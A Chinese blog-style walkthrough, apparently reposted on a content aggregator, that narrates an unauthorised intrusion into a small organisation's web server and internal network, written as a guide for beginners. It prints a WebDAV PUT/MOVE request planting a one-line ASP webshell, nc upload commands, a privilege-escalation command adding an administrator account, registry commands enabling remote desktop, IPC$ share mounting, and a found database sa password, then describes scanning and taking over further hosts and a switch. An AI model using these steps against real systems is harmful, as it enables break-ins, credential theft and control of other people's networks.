一次比较经典的内网入侵渗透案例,说白了就是局域网渗透,供菜鸟 内网渗透

看站

旁注查询下,发现只有一个站,用的两个域名,跳转到同一个网站目录

既然不是大站,咱们就一通乱扫吧,应该不会有IDS啊什么的等着我们,嘿嘿

用wwwscan先扫了下目录文件啊什么的

猜目录的同时祭出咱们的WVS神器,配好数据,开骚

WVS不愧是神器,几分钟就扫出了几个严重的漏洞,看来这个站真的不安全

严重漏洞包括注入和WebDAV设置不当

注入看了下

Access的数据库没有猜出密码字段

与此同时wwwscan的扫描结果出来了

后台

Ewebeditor编辑器以及编辑器后台

两个后台都先试了下弱口令都没有弱口令查看Ewebeditor编辑器版本知道版本才好杀嘛

版本5.5百度了下网上的通杀EXP都不好使估计漏洞都补上了

看网站后台咱们不是还有个注入吗既然猜不到字段会不会后台的POST值就是字段值呢一般的程序员都喜欢偷这个懒

查看后台源码

好刚刚不是猜出了帐号字段吗和我们的猜想吻合了一半那密码字段可能就是user_psw了加到注入工具中跑密码MD5

果然密码的MD5值跑出来了

拿到cmd5上去破解

拿密码进后台

在后台转了很久能上传的地方都做了文件类型禁止思路一下就断了

上个厕所看会儿电影回来再想忽然想起WVS不是扫出了个WebDAV权限设置不当漏洞吗

果断写了个txt内容

PUT/zerosoul.txtHTTP/1.1

HOST:www.xxxx.com

Content-Length:23

<%evalrequest("cmd")%>

我解释下啊WebDAV权限设置不当一般就是IIS写权限漏洞啊什么的具体的可以百度

这里用的是PUT动作直接PUT一个TXT上去

然后用nc传上去

nc.exewww.xxxx.com80<1.txt

访问下/zerosoul.txt存在

然后把那个txt用MOVE动作MOVE成asp后缀

MOVE/zerosoul.txtHTTP/1.1

HOST:www.xxxxz.com

Destination:http://www.xxxxx.com/asp.asp

nc.exe网址80<1.txt

然后访问asp.asp存在

菜刀连接之

密码cmd

上大马看了下WS组件在那我们就直接上传cmd先把把自己的2003系统的cmd.exe重命名成cmd.com传上去了

虚拟终端下执行命令

我擦碉堡了居然有内网懂的同学知道看到这种IP的就知道是内网环境

Systeminfo下发现对方服务器没有打上PR的补丁没办法pr提权

C:recyclerpr.exe"netuseradmin$123456/add&netlocalgroupadministratorsadmin$/add"

执行这个命令后就加了一个用户了

Netstat-na没开3389端口

那就读注册表看看开了RDP服务没

REGQUERY"HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlTerminalServer"

发现fDenyTSConnections值为0那就是开了

端口号改掉了

读取注册表

REGQUERY"HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlTerminalServerWdsrdpwdTdstcp"

远程桌面的端口号改成3390了

远程终端连接之

然后就是读取管理员hash拿hash去破解

删除admin$帐号再用管理员的帐号administrator去登录

上去了就是就是咱们的内网之旅咯

上传cainhscanX-Scan一个是内网ARP嗅探工具另外两个个是内网扫描工具

然后一顿扫

(哈哈小站就不用顾虑那么多啦)

得到一下信息

网络拓扑结构大概是

.1是外网出口

.2是网关

其他的是内网成员

.40之后的就是其他的内网段了

先搞同网段的这几台电脑吧

Ipconfig/all啊

Netview/domain啊没有域啊啊啊啊啊啊啊啊

Hscan骚啊骚啊骚啊骚

几个sa几个FTP一个mysql

上传1433综合利用工具mysql.exe啊啊啊啊

用读出的本机hash远程同内网的server3啊(4和56没有开远程还是貌似改掉了端口号)发现能连

靠失败的WebDAV啊他居然还用

里面貌似还有很多内网段

.26开了1433

3389没开咱们替他开咯

regdelete"HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlTerminalServer"/vfDenyTSConnections/f

regadd"HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlTerminalServer"/vfDenyTSConnections/tREG_DWORD/d0/f

添加帐号密码远程登录

上去关360读hash其实如果为了便于管理可以给他们种马但是友情检测那就算了

ftp过去

拿下.26

.24没有开338980服务也是只有默认页面其他的服务都没有开

那么可以直接IPC上去

netuse\10.10.1.24ipc$"密码"/user:"用户名"

netuseh:\10.10.1.24c$

在24的默认网站路径上面写个asp大马然后传个cmdpr开3389

成功拿下

IPC$.25

在他的默认网站路径里面找网站

找啊找啊找

找到一个网站的配置文件

打开

看啊看

pplication("ConnString")="Provider=SQLOLEDB.1;PersistSecurityInfo=False;UserID=sa;Password=dsideal;InitialCatalog=fsms;DataSource=10.10.1.25"

发现sa

连上去

3389之

对了咱们不是还看到一个SERVER1吗

那我们就去找找那个SERVER1

IPC

先不看SERVER1了

然后就是.10了

80访问上去真吓人,还尼玛审计行为呢

试了几个密码他都说验证码错误我也不清楚怎么搞的

本内网的几台服务器本拿下了

可惜的是没配好马啊

现在就是要看看其他内网段了

.1.2是H3C交换机任何外网IP与.22连接都显示10.10.1.1那么.1.1就是连接Internet的路由器了

80端口访问.1.2用交换机的弱口令进去了

路由信息

所有电脑的MAC

所有的与.1.2连接的网段

现在可以大概的画出这个内网的网络拓扑结构

我就用画图工具随便画个出来大家别笑哈

用HSCAN和X-scan扫了下10.10.11.1/24貌似是个PC个人电脑网段猜想是办公室还是机房什么的吧

含有大量的windows电脑

并且扫了下其他的网段

发现10.10.12.1/2410.10.13.1/2410.10.14.1/2410.10.15.1/2410.10.16.1/24都是空的

而在10.10.17.1/24网段发现大量的linux主机存活并且开有80端口

IP前73的均为Linux而73之后的却为windows

10.10.17.248为无线路由器

10.10.18.1/24存活少量windowsIPC都能连上但是蛋疼地没开共享没办法

10.10.19.1/24

10.10.20.1/24

10.10.24.1/24

10.10.25.1/24

10.10.26.1/24

都有电脑存活但是都尼玛是PC

拿下的几台服务器种了马但上线几分钟后又掉了估计那个行为审计服务器有防火墙功能

百度了下那套审计系统给跪了国家级的防御系统~~~~要不少钱吧

  

爱华网本文地址 » http://www.aihuau.com/a/25101018/375235.html

更多阅读

《护送钱斯》影评--再一次经历灵魂的洗礼 护送钱斯 影评

看这部电影完全是出于偶然。因为迅雷的电影库把这部影片归为战争片。而我一向是比较喜欢看战争片的。我曾经深究过自己为什么喜欢比较喜欢看战争片,例如经典的《拯救大兵雷恩》《黑鹰坠落》等,但是没有一个明确的答案。或许是只有在血

一次劈剑的奇妙体验 亲子 奇妙的触觉体验

一次劈剑的奇妙体验相信大家都劈过剑吧!那么,大家在劈剑的过程中,肯定也遇到了不少问题。比如说:不知道怎么发力呀,老师怎么“纠”你的动作你也做不到位呀……我以前,也和大多数人一样,很“荣幸”的成为了这个“大家族”里面的一员:不知道

汗蒸注意事项 汗蒸多久一次比较好

 十大功效:  一:最显著的一点就是,美白肌肤,改变肌肤的肤质,增强皮肤的弹性,延缓衰老,尤其是妇女最为明显,蒸过几次后就会使肌肤光华柔嫩。  二:具有消除赘肉,驱减脂肪,润白皮肤,健美修形的作用,对减肥也有显著疗效。  三:电气石持续释放出

声明:《一次比较经典的内网入侵渗透案例,说白了就是局域网渗透,供菜鸟 内网渗透》为网友抹茶味的百奇分享!如侵犯到您的合法权益请联系我们删除